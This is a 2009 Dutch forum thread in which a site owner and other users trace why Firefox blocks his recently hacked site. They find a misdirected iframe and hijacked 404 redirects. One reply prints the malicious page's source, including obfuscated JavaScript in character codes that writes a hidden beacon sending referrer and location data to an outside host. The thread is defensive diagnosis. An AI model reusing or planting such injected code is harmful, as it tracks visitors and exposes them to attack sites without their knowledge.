[html] FF+ie errors - Softwareontwikkeling

zondag 30 augustus 2009 21:33

Acties:

0 Henk 'm!

Topicstarter

Hallo,
Ik heb een probleem wat ik nog niet eerder gezien heb. De site waar ik aan werk werkt prima in IE maar in FF krijg ik extra ongewenste content in mn site. Ik heb al mijn code nagelopen maar kan nergens de verwijzing vinden naar advancedsearch of tsang.com. Deze verwijzing zorgt er denk ik ook voor dat mijn site als onveilig beschouwd wordt door ff. Voorheen heb ik een wordpress blog gehost wat "gehacked" is geweest. Hierna heb ik mijn ftp leeg gemaakt en mijn wachtwoord veranderd. Daarna deze site weer online gezet maar met dit resultaat dus. Kan dit er mee te maken hebben? Iemand een oplossing? Heb ik misschien iets op mn pc draaien wat ik nog niet heb kunnen ontdekken? Site is trouwens te bekijken op www.projekt86.nl/dev
Alvast bedankt.

Afbeeldingslocatie: http://www.projekt86.nl/ff3.5_projekt86_02.png

Afbeeldingslocatie: http://www.projekt86.nl/ff3.5_projekt86_02.png

zondag 30 augustus 2009 21:35

Acties:

0 Henk 'm!

ironx

Ik weet niet, maar firefox komt met de melding:

This web site at www.projekt86.nl has been reported as an attack site and has been blocked based on your security preferences.

This posting is provided "AS IS" with no warranties, and confers no rights.

zondag 30 augustus 2009 21:45

Acties:

0 Henk 'm!

crisp

Devver

Pixelated

Wellicht een 404-handler van je hoster? Da's natuurlijk niet helemaal netjes, maar het probleem wordt wel veroorzaakt door dit in je index:

HTML:

1	<iframe name="content" width="1024" height="613" scrolling="no" hscrolling="no" src="html\nieuws.htm" frameborder="0"></iframe>

note de verkeerde slash in het src-attribuut; dit doet namelijk een request naar http://www.projekt86.nl/dev/html%5Cnieuws.htm en niet naar http://www.projekt86.nl/dev/html/nieuws.htm en die eerste redirect naar http://1502998896/~bitrid/

[ Voor 6% gewijzigd door crisp op 30-08-2009 21:46 ]

Intentionally left blank

zondag 30 augustus 2009 21:52

Acties:

0 Henk 'm!

japaveh

Jield BV

Het feit dat FF de site als aanvalssite aanmerkt komt door de verwijzing in Google. (bron. Chrome laat me niet eens direct naar het topic op GoT gaan omdat er gelinkt wordt vanaf deze site.

Je kunt dit oplossen via Google Webmaster tools.

De oorzaak is dat er in http://www.project86.nl/dev/html/nieuws.htm een stukje javascript staat dat waarschijnlijk door iemand anders is geinjecteerd, wellicht via een gestolen FTP.
UPDATE: zie hieronder, je wordt inderdaad geredirect naar een pagina waar onderstaande info staat.

HTML:

<HTML><HEAD><TITLE>Search The Web</TITLE>
</HEAD>
<BODY>

<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!106!97!118!97!115!99!114!105!112!116!34!62!13!10!114!61!34!34!43!77!97!116!104!46!114!97!110!100!111!109!40!41!43!34!38!114!101!102!61!34!43!101!115!99!97!112!101!40!100!111!99!117!109!101!110!116!46!114!101!102!101!114!114!101!114!41!43!34!38!112!103!61!34!43!13!10!101!115!99!97!112!101!40!119!105!110!100!111!119!46!108!111!99!97!116!105!111!110!46!104!114!101!102!41!59!13!10!100!111!99!117!109!101!110!116!46!119!114!105!116!101!40!34!60!105!109!103!32!115!114!99!61!39!104!116!116!112!58!47!47!97!108!108!115!116!97!114!99!108!105!99!107!46!99!111!109!47!115!116!97!116!47!99!111!117!110!116!101!114!46!112!104!112!63!105!100!61!34!43!13!10!114!43!34!39!32!98!111!114!100!101!114!61!48!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!32!97!108!116!61!83!112!101!83!116!97!62!34!41!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>

<script language="JavaScript" src="blogs.js"></script><script language="JavaScript">google("")</script>

</BODY></HTML>

hier nog meer info

Solo Database: Online electronic logbook and database system for research applications

zondag 30 augustus 2009 22:08

Acties:

0 Henk 'm!

ijzerman86

Topicstarter

Ok nuttige info, daar ga ik mee bezig. Snelle vraag nog even@japaveh, wat kan ik er aan doen dat iemand mn ftp gegevens heeft? Ik heb ze de afgelopen week al 2 keer gewijzigd, draait dr iets onzichtbaars op mn pc dat gegevens doorstuurt ofzo? Lokaal is de file namelijk schoon.

zondag 30 augustus 2009 22:12

Acties:

0 Henk 'm!

japaveh

Jield BV

ijzerman86 schreef op zondag 30 augustus 2009 @ 22:08:
Ok nuttige info, daar ga ik mee bezig. Snelle vraag nog even@japaveh, wat kan ik er aan doen dat iemand mn ftp gegevens heeft? Ik heb ze de afgelopen week al 2 keer gewijzigd, draait dr iets onzichtbaars op mn pc dat gegevens doorstuurt ofzo? Lokaal is de file namelijk schoon.

Ik vermoed inderdaad het laatste. Ik heb hetzelfde gehad op 1 van mijn sites die door iemand anders werd onderhouden. Wat we zagen was dat er via FTP elke dag werd ingelogd en alle index.php/index.html's werden gewijzigd. Er werd namelijk steeds een <iframe> toegevoegd.

De andere persoon wijzigde steeds het FTP wachtwoord maar na een aantal dagen was het weer raak, waarschijnlijk draaide er bij hem malware die steeds het FTP wachtwoord achterhaalde

Nadat ikzelf het FTP wachtwoord had veranderd en hij zijn PC had geformatteerd was het opgelost.

Solo Database: Online electronic logbook and database system for research applications

zondag 30 augustus 2009 22:46

Acties:

0 Henk 'm!

crisp

Devver

Pixelated

Er zit helemaal geen javascript in de pagina op http://www.projekt86.nl/dev/html/nieuws.htm

Echter, als je naar http://www.projekt86.nl/dev/html%5Cnieuws.htm gaat (als gevolg van de verkeerde slash in de index), of om het eender naar een willekeurige andere niet-bestaande pagina op hetzelfde domein, bijvoorbeeld http://www.projekt86.nl/dev/blaat dan wordt je geredirect.

Intentionally left blank

zondag 30 augustus 2009 22:57

Acties:

0 Henk 'm!

japaveh

Jield BV

crisp schreef op zondag 30 augustus 2009 @ 22:46:
Er zit helemaal geen javascript in de pagina op http://www.projekt86.nl/dev/html/nieuws.htm

Echter, als je naar http://www.projekt86.nl/dev/html%5Cnieuws.htm gaat (als gevolg van de verkeerde slash in de index), of om het eender naar een willekeurige andere niet-bestaande pagina op hetzelfde domein, bijvoorbeeld http://www.projekt86.nl/dev/blaat dan wordt je geredirect.

Ah, ja je hebt gelijk.

Die redirect levert inderdaad een website met bovenstaande JS op, nasty...Dit verandert misschien wel de theorie van een geinjecteerd <iframe>, het is wel opmerkelijk dat een niet-bestaande URL wordt geredirect.

[ Voor 15% gewijzigd door japaveh op 30-08-2009 23:03 ]

Solo Database: Online electronic logbook and database system for research applications

maandag 31 augustus 2009 09:19

Acties:

0 Henk 'm!

ijzerman86

Topicstarter

Is zoiets geregeld door mn host? Als ik niks op mn ftp heb staan wordt ik altijd geredirect naar hun site, nooit iets externs.

maandag 31 augustus 2009 10:55

Acties:

0 Henk 'm!

tonyisgaaf

ijzerman86 schreef op maandag 31 augustus 2009 @ 09:19:
Is zoiets geregeld door mn host? Als ik niks op mn ftp heb staan wordt ik altijd geredirect naar hun site, nooit iets externs.

Een 404 redirect kan ook in een .htaccess staan.

NL Weerradar widget Euro Stocks widget Brandstofprijzen widget voor 's Dashboard

maandag 31 augustus 2009 16:11

Acties:

0 Henk 'm!

mcDavid

japaveh schreef op zondag 30 augustus 2009 @ 22:57:
[...]

Ah, ja je hebt gelijk.

Die redirect levert inderdaad een website met bovenstaande JS op, nasty...Dit verandert misschien wel de theorie van een geinjecteerd <iframe>, het is wel opmerkelijk dat een niet-bestaande URL wordt geredirect.

Gebeurt steeds vaker, dat na een serverhack de 404- of andere HTTP-foutmeldingspagina's worden aangepast.